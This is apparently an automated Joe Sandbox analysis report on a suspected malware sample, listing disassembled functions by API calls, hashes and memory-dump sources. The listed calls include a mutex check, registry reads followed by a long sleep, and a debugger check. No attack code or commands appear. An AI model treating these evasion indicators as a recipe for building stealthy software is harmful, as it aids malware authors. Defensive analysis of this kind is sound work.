                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesCreateErrorFileLastMutex
                                                                                                • String ID:
                                                                                                • API String ID: 3621940766-0
                                                                                                • Opcode ID: 4586e372c8270ba0ecff17bc604ecf5576abcdad40b7178b2755933e23f8b0c0
                                                                                                • Instruction ID: 7170611a0c6a7bf0faa0dc985e0c5b0cc88b1469eddca81e0c9b550f04483b35
                                                                                                • Opcode Fuzzy Hash: 4586e372c8270ba0ecff17bc604ecf5576abcdad40b7178b2755933e23f8b0c0
                                                                                                • Instruction Fuzzy Hash: BE210271B001045BEB288BB8DD85BEDBB62DF81314F24861CF495DB7DACB7E99818B40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00CB66BE
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
                                                                                                • GetLastError.KERNEL32 ref: 00CB6CDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesCreateErrorFileLastMutex
                                                                                                • String ID:
                                                                                                • API String ID: 3621940766-0
                                                                                                • Opcode ID: 2702f60fcdb557fe27bc9f84301325cd1e0feb8df585a117662436703ef47246
                                                                                                • Instruction ID: c544974a5b1eef76f12dcd9d4ec647b45f5fb0673a9952e18ea353e0e4eb8b44
                                                                                                • Opcode Fuzzy Hash: 2702f60fcdb557fe27bc9f84301325cd1e0feb8df585a117662436703ef47246
                                                                                                • Instruction Fuzzy Hash: DB2105727101045BEF188B68DD89BADBB62DF81318F20861CF0919B3D6DB7D89818740
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00CB67DE
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
                                                                                                • GetLastError.KERNEL32 ref: 00CB6CDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesCreateErrorFileLastMutex
                                                                                                • String ID:
                                                                                                • API String ID: 3621940766-0
                                                                                                • Opcode ID: 92d96e9c8d8f9f0847d1254f7612eb5ea9495d96965317a5c399ae12a03c24d7
                                                                                                • Instruction ID: 15350a6e27291cadc479adae6c0f745e2eabdc152f35500aef1514893e6cd3d4
                                                                                                • Opcode Fuzzy Hash: 92d96e9c8d8f9f0847d1254f7612eb5ea9495d96965317a5c399ae12a03c24d7
                                                                                                • Instruction Fuzzy Hash: D2210571B101049BEF189BB8DD85BADBA62EF81714F24861CF0919B3D6CB7E89819741
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00CB68FE
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
                                                                                                • GetLastError.KERNEL32 ref: 00CB6CDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesCreateErrorFileLastMutex
                                                                                                • String ID:
                                                                                                • API String ID: 3621940766-0
                                                                                                • Opcode ID: 440b20935a5b32a2b9f8ca7563fcc706180b660d8022da47852887a136d85d1b
                                                                                                • Instruction ID: 212f5d99c1a5f4fceaf21d9cb74698e78013c7747ed72e6499cc892bd131f533
                                                                                                • Opcode Fuzzy Hash: 440b20935a5b32a2b9f8ca7563fcc706180b660d8022da47852887a136d85d1b
                                                                                                • Instruction Fuzzy Hash: 96212971B001045BDB189B79DD85B9DBB62DF86314F24861CF091DB3D6CB7E89819740
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00CB6A1E
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
                                                                                                • GetLastError.KERNEL32 ref: 00CB6CDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesCreateErrorFileLastMutex
                                                                                                • String ID:
                                                                                                • API String ID: 3621940766-0
                                                                                                • Opcode ID: d182483731e96474b0ba525474cdc86ae5d2e89bfc5942c1371227ee1b11422c
                                                                                                • Instruction ID: 02ddb7592872a859b1d9da637dabd6bd2090c9ff1c45fb793f0008ddaa15b5d9
                                                                                                • Opcode Fuzzy Hash: d182483731e96474b0ba525474cdc86ae5d2e89bfc5942c1371227ee1b11422c
                                                                                                • Instruction Fuzzy Hash: F521F3317101045BEF189BB8DD85BADBA62DF81314F24C61CE495AB2D6CB7D8E81A740
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00CB6B3E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 6e9ecc913b05dd569134749bb2e9fd475f14428afe4978555ba90cdd0106735b
                                                                                                • Instruction ID: 9696a0703b48e9a21a9edf4054d64655f6d7cbc8c7d994101a77c26b2d583da1
                                                                                                • Opcode Fuzzy Hash: 6e9ecc913b05dd569134749bb2e9fd475f14428afe4978555ba90cdd0106735b
                                                                                                • Instruction Fuzzy Hash: 362124327001085BEB188B78DDC9BADBA72DF86314F24861CE495DB7D6DB7D89C19B40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __wsopen_s
                                                                                                • String ID:
                                                                                                • API String ID: 3347428461-0
                                                                                                • Opcode ID: f54f0201f44c64946252839d8194659db5b6ffef4bbdcbc1ef0ee7f54efdf712
                                                                                                • Instruction ID: 59ac3cb5178d3dfcdc91c511d7971af583806515f832a7ddec92ec9eedd1d67e
                                                                                                • Opcode Fuzzy Hash: f54f0201f44c64946252839d8194659db5b6ffef4bbdcbc1ef0ee7f54efdf712
                                                                                                • Instruction Fuzzy Hash: BA111575A0420AAFCB05DF58E941E9B7BF5EF49314F0440A9F809AB252DA70EA15CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 529a0e24dde19635c73a1964b7abab97d8e277f8b11429d641730b403236f31c
                                                                                                • Instruction ID: d917db3bd374d963517bba33c73790f442e60617a8ecd250394e857d452734c9
                                                                                                • Opcode Fuzzy Hash: 529a0e24dde19635c73a1964b7abab97d8e277f8b11429d641730b403236f31c
                                                                                                • Instruction Fuzzy Hash: F5018871C04119AECF01ABA4DC05F9D7BF4AB04310F14416EF428E21D1D6309A80D784
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 00110a33c614953caa58d168d93d9cae1daaf8921c40e879f3a90e6df9376c32
                                                                                                • Instruction ID: 1c353b0a206139695d64da17a3dfc6b0959cca9e509dd56b7d66df61832cee8d
                                                                                                • Opcode Fuzzy Hash: 00110a33c614953caa58d168d93d9cae1daaf8921c40e879f3a90e6df9376c32
                                                                                                • Instruction Fuzzy Hash: F6012C72C1015DAFCF01AFA8DC01EEEBFB5AB08314F144569F924A21A1E6318A20AB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,00CC0FAC,?,?,00CC2609,00CC0FAC,?,00CC13D8,E800CE42,777D6490), ref: 00CC8E6C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: aee067a9efe351fe397f7f5467d9590a47da3755b2ad3a36e258a3b68c9b7813
                                                                                                • Instruction ID: 93aa1743d5a6f8b5f0376faf227c3c0de0d2983d7095b468636a98e754665b34
                                                                                                • Opcode Fuzzy Hash: aee067a9efe351fe397f7f5467d9590a47da3755b2ad3a36e258a3b68c9b7813
                                                                                                • Instruction Fuzzy Hash: D8E0223A100234AAEA3127B6CC00F6F374CCF617B0F08022CEC249A090CF30DD0592E5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00CCE769,?,?,00000000,?,00CCE769,00000000,0000000C), ref: 00CCE396
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 1b7467b072e30f96b01efb1acb448a000c46124aa8d1c481b90153122f8e6e39
                                                                                                • Instruction ID: 5137405a1d2fc29cee42738f825c75fc091fd0c12984e0e067612193554cc149
                                                                                                • Opcode Fuzzy Hash: 1b7467b072e30f96b01efb1acb448a000c46124aa8d1c481b90153122f8e6e39
                                                                                                • Instruction Fuzzy Hash: 83D06C3200010DFBDF028F84DC06EDE3BAAFB48754F014000BA1856020C732E861AB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
                                                                                                  • Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
                                                                                                  • Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2
                                                                                                • Sleep.KERNELBASE(0002BF20), ref: 00CC102B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                                • String ID:
                                                                                                • API String ID: 4119054056-0
                                                                                                • Opcode ID: ed7e8c7a9f83d6dfbc2167365dd3851b82c5a5d7e35bf05438b8c83ac764d9d3
                                                                                                • Instruction ID: efb2dce1d8a81c0f18aa1fe47c789935bf0120cbc960312cd5b37e0b9b715621
                                                                                                • Opcode Fuzzy Hash: ed7e8c7a9f83d6dfbc2167365dd3851b82c5a5d7e35bf05438b8c83ac764d9d3
                                                                                                • Instruction Fuzzy Hash: 6EE0C226F0002023081436BF9C13A2D3A110AA3B90B8C019CFC4B2B3E7EC410C5613D3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
                                                                                                  • Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
                                                                                                  • Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2
                                                                                                • Sleep.KERNELBASE(0002BF20), ref: 00CC0FDB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                                • String ID:
                                                                                                • API String ID: 4119054056-0
                                                                                                • Opcode ID: 89418f1f76da51351f61f0fddb1c47585c8ceccbe1fc7ddfc4f1050aca9f5f75
                                                                                                • Instruction ID: 5d376049ac215656ccab81da643ab54d3a65ad034a9d7e20048ca008866829ed
                                                                                                • Opcode Fuzzy Hash: 89418f1f76da51351f61f0fddb1c47585c8ceccbe1fc7ddfc4f1050aca9f5f75
                                                                                                • Instruction Fuzzy Hash: 6AE0C226F0046023080436BE9C17A2D3A1109A3B90B8D01ACEC472B3E7EC411D5623D3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __floor_pentium4
                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                • API String ID: 4168288129-2761157908
                                                                                                • Opcode ID: a4d7a49f8239b604ef93da03e8ed9c0be5ba99440948dfb89dd1debf7257f0bd
                                                                                                • Instruction ID: 9bd79e31e8abe0d932dee578e69e7ebe544803cb70831c9f2a4ed2e229485e8b
                                                                                                • Opcode Fuzzy Hash: a4d7a49f8239b604ef93da03e8ed9c0be5ba99440948dfb89dd1debf7257f0bd
                                                                                                • Instruction Fuzzy Hash: E5C21671E046289FDB24CE28DD407EAB3B5EB88304F1941EBD95DA7340E775AE819F40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00CC6F20
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00CC6F2A
                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00CC6F37
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: d8101a23085384494799bc11ef8473e8ceb26ae35dc4f7fd8204e42115d8ab98
                                                                                                • Instruction ID: b40e55a64338ccbe88298019d9d768e0240d3fec67fc92b08d53c7d8f8e907ac
                                                                                                • Opcode Fuzzy Hash: d8101a23085384494799bc11ef8473e8ceb26ae35dc4f7fd8204e42115d8ab98
                                                                                                • Instruction Fuzzy Hash: E131C375901228EBCB21DF68D989BCDBBB8BF08310F5041EAE41CA7251E7709F859F45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00CC814B,?,00CC4AB0,00CC5036,?,00CC814B,00CC5036,00CC814B,00000003), ref: 00CC4AD3
                                                                                                • TerminateProcess.KERNEL32(00000000,?,00CC4AB0,00CC5036,?,00CC814B,00CC5036,00CC814B,00000003), ref: 00CC4ADA
                                                                                                • ExitProcess.KERNEL32 ref: 00CC4AEC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: b30ad432fa345ccc3ee5148d960d02e08485692668966484a2500f13570cd20d
                                                                                                • Instruction ID: 71a45270baadd542aaceea4018a0b9ca72d564b4e11916a819db907cba6e226b
                                                                                                • Opcode Fuzzy Hash: b30ad432fa345ccc3ee5148d960d02e08485692668966484a2500f13570cd20d
                                                                                                • Instruction Fuzzy Hash: 53E04631041108EBCB156B64DC1DF5E3B39FB00381F004019F81686231CB39EE91EB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
